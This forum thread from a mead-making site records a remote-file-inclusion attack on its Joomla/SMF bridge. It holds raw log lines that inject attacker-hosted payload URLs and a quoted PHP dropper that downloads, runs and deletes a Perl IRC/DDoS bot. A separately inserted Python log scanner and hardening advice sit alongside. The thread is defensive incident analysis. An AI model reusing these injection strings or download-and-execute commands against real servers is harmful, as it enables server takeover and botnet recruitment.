Thread: Gotmead.com being exploited by IRC hacks - any suggestions?

  1. #1
    Join Date
    Apr 1996
    Location
    Youngsville, NC
    Posts
    1,610

    Gotmead.com being exploited by IRC hacks - any suggestions?

    Gang, I'm working on the search issue, but my host just informed me that we're being exploited by IRC hackers, to wit:

    Code:
    /component/option,com_pccookbook/page,viewrecipe/recipe_id,119/mead-research/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    /component/option,com_pccookbook/page,viewrecipe/cat_id,1/recipe_id,1/mead-research/component/option,com_smf/Itemid,183/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://azpcrepair.com/siteb/plugins/spamx/id.txt?
    //components/com_smf/smf.php?mosConfig_absolute_path=http://azpcrepair.com/siteb/plugins/spamx/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    //components/com_smf/smf.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /index.php?option=com_smf&Itemid=397&action=login//modules/mod_calendar.php?absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    //modules/mod_calendar.php?absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vampirehack/Strings.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/vampirehack/Strings.txt?
    /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://aespeechanddrama.org/components/com_smf/echo.txt??
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif?
    If you are an expert in php security or know of ways to block this, please email me at gotmead AT gotmead DOT com. I'm working on this, but am hampered by not being able to change the core code of the site without trashing the whole site.

    Vicky - harried and typing as fast as I can
    Wassail!

    Vicky Rowe
    Owner & Webmistress, Gotmead.com
    Executive Director, American Mead Makers Association
    http://www.mead-makers.org
    Making Mead since 1995

  2. Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    A quick Google on the problem: I found out there's a security leak in the Joomla <-> SMF bridge which can be exploited by IRC.

    I don't know the writers/programmers of the bridge, but perhaps check their website for an update.

  3. Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Quote Originally Posted by Vicky - GM Webmistress

    If you are an expert in php security or know of ways to block this, please email me at gotmead AT gotmead DOT com. I'm working on this, but am hampered by not being able to change the core code of the site without trashing the whole site.

    Vicky - harried and typing as fast as I can
    A tip I got (I had about the same experiences on my community as GM has gone through..): I went from an open-source forum to a commercial one.

    I never ever regretted the day I decided to convert my forums to vBulletin. It's well worth the money, and very easy to add some mods (which are all checked by vBulletin developers) that do the same as GM has now (articles + forum).

    There are two options in that which I can recommend:
    either vBAdvanced (for portal and articles) + vBulletin
    or vBAdvanced (for portal) + vBulletin + MediaWiki (for articles) (I prefer this one.. see my site as an example: www.birthright.net )


  4. #4

    Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Vicky,

    I'm no expert on XSS, nor am I familiar with SMF. But looking at the logs you posted, it appears that the poor script kiddie is running a script that's just brute force attempting various combinations in the hope that one will work.

    Some of the tools linked to in the logs are:
    http://www.freewebtown.com/vampirehack/Strings.txt (just as it sounds, a list of strings indicating vulnerable installations)
    http://www.thomashamilton.net/id.txt (poor welding company is being used to host this)
    http://aespeechanddrama.org/components/com_smf/echo.txt (this just contains a PHP command to echo "1122548")
    http://www.the-esao.com/imag/stringa.txt (PHP script to check for permissions to execute the exec(), shell_exec(), system() or passthrough() functions, grabbing the current disk usage)
    http://paginas.terra.com.br/lazer/lunero/id.txt (another PHP script to check the OS and permissions to execute commands. This script attempts to play around with cookies. It determines the username that Apache is running as, as well as which kernel release the webserver is running. It then sets cookies with that data. This is very useful if you're going to try to completely take over the machine.)

    Sprinkled throughout are attempted fopens to http://someone.co.il/onfokh.gif?
    No surprise here, but there's not an image at that URL... instead there is a *gasp* PHP script that contains the following code

    Code:
    <?
    passthru('cd /var/tmp;wget http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;curl -O http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;lwp-download http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;lynfile.txt -source http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;fetch http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    passthru('cd /var/tmp;GET http://someone.co.il/someone.txt;perl someone.txt;rm -rf someone.txt*');
    ?>
    :)
    So they're trying to get the webserver to download and execute the perl script at http://someone.co.il/someone.txt, removing it afterwards.

    Now, a lot of that Perl script is in Portuguese.... But they set up the script to join channel ' ##ddos3## ' on the server internetron.bsd.st.

    My brain is starting to bleed from all the Portuguese Perl (and I thought Perl couldn't get any worse!) But I see a sub in there for DCC file transfers. Then again, this looks like a modified DDoS script, so that may be left over. At any rate though, I'm not going to finish reading it... whatever it's doing, it won't be good.

    My advice: in addition to blocking the IP address block of the originating attack, I'd block internetron.bsd.st ( 209.63.212.17 ) as well as irc.gigachat.net ( 66.252.24.10 ) (gigachat.net is mentioned in the comments of the Perl script, though I didn't see it used).

    If your host is willing (and it won't break anything), I'd also disable shell_exec, passthru, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, exec and system in the php.ini. This may very well not be feasible; at the very least, allow_url_fopen should be disabled.

    Just a guess, but if he had broken in he probably would have left his nice little card that he spent so much time on. Following that we'd probably be constantly bombarded by nasty posts throughout the forum and admins might find themselves locked out.


    Hope this helps in some way.

    Meadmaker since 2006. As of Aug, 2012 ~ 15 batches. Mostly meads and ciders, only a few beers. Just now getting to know enough to be dangerous.

    Double check any advice that comes out of my mouth (err, hands).
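As an added example (not code from the thread, nor from Joomla or SMF), here is a small Python scanner for the pattern the post above describes: it reads Apache access-log lines, flags requests where a query parameter such as mosConfig_absolute_path is set to an off-site URL, and tallies the payload hosts and source addresses a host could block. The log lines are constructed samples that reuse payload hosts named in the thread; the client IPs and user agents are invented.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# A query parameter assigned a remote URL, i.e. the remote-file-inclusion (RFI) pattern in the
# thread's logs (mosConfig_absolute_path=http://..., absolute_path=http://...).
RFI_RE = re.compile(r'([A-Za-z_][A-Za-z0-9_\[\]]*)=((?:https?|ftp)://[^&"\s]+)', re.I)

# Apache combined log: client IP, timestamp, request line, status (remaining fields ignored).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines: payload hosts are those named in the thread, client IPs are
# documentation-range addresses, and the user agents are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2007:03:14:01 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://someone.co.il/onfokh.gif? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [12/Mar/2007:03:14:02 -0500] "GET /index.php?option=com_smf&Itemid=397&action=login//components/com_smf/smf.php?mosConfig_absolute_path=http://azpcrepair.com/siteb/plugins/spamx/id.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
198.51.100.9 - - [12/Mar/2007:03:20:45 -0500] "GET /modules/mod_calendar.php?absolute_path=http%3A%2F%2Fpaginas.terra.com.br%2Flazer%2Flunero%2Fid.txt%3F HTTP/1.1" 200 77 "-" "Mozilla/4.0"
192.0.2.22 - - [12/Mar/2007:03:21:10 -0500] "GET /index.php?option=com_smf&Itemid=183 HTTP/1.1" 200 9031 "http://www.gotmead.com/" "Mozilla/5.0"
"""

def find_rfi(target):
    """Return (parameter, remote_url) for the first query value that points off-site, else None.
    The target is percent-decoded first so an encoded 'http%3A%2F%2F' does not slip past."""
    m = RFI_RE.search(unquote(target))
    if m is None:
        return None
    # The trailing '?' seen in the thread's URLs turns the rest of the include path into a
    # query string on the attacker's server; strip it so the reported URL is the payload itself.
    return m.group(1), m.group(2).rstrip("?")

def scan_log(text):
    """Scan access-log text and return RFI attempts with per-host and per-source counts."""
    attempts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        hit = find_rfi(m.group("target"))
        if hit is None:
            continue
        param, url = hit
        attempts.append({"ip": m.group("ip"), "param": param, "url": url,
                         "host": urlsplit(url).hostname, "status": int(m.group("status"))})
    return {"attempts": attempts,
            "payload_hosts": Counter(a["host"] for a in attempts),  # candidates for an egress block
            "source_ips": Counter(a["ip"] for a in attempts)}       # candidates for a client block

def needs_triage(report):
    """Attempts answered with HTTP 200: not proof the include ran, but the ones to check first."""
    return [a for a in report["attempts"] if a["status"] == 200]
```

A 404 on an attempt still deserves a client block, but a 200 against a vulnerable component is the line to investigate on the server itself (shell history, /var/tmp, outbound IRC connections), since the include may have executed.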

  5. #5
    Join Date
    Dec 2004
    Location
    The OC
    Posts
    7,874

    Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Thanks for the dangerous journey through the Portuguese Perl!

    We've got most of what you pointed out done at the php.ini level, and the bridge hacks have also been shut down. There are a couple of things that we're working with our new host on, and we'll be sure to see about the additional php.ini suggestions you made.

    thanks so much for the analysis,

    Oskaar
    Is it tasty . . . precious?

  6. #6

    Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Yeah I was pretty late on the reply. On the bright side, it was an interesting rabbit hole to play around in.


    Glad you guys have got it covered!



    Cheers
    Meadmaker since 2006. As of Aug, 2012 ~ 15 batches. Mostly meads and ciders, only a few beers. Just now getting to know enough to be dangerous.

    Double check any advice that comes out of my mouth (err, hands).

  7. #7
    Join Date
    Apr 1996
    Location
    Youngsville, NC
    Posts
    1,610

    Re: Gotmead.com being exploited by IRC hacks - any suggestions?

    Yeah, thanks! I added the additional strings to the .htaccess file, and had already done the others to the php.ini.
    Wassail!

    Vicky Rowe
    Owner & Webmistress, Gotmead.com
    Executive Director, American Mead Makers Association
    http://www.mead-makers.org
    Making Mead since 1995
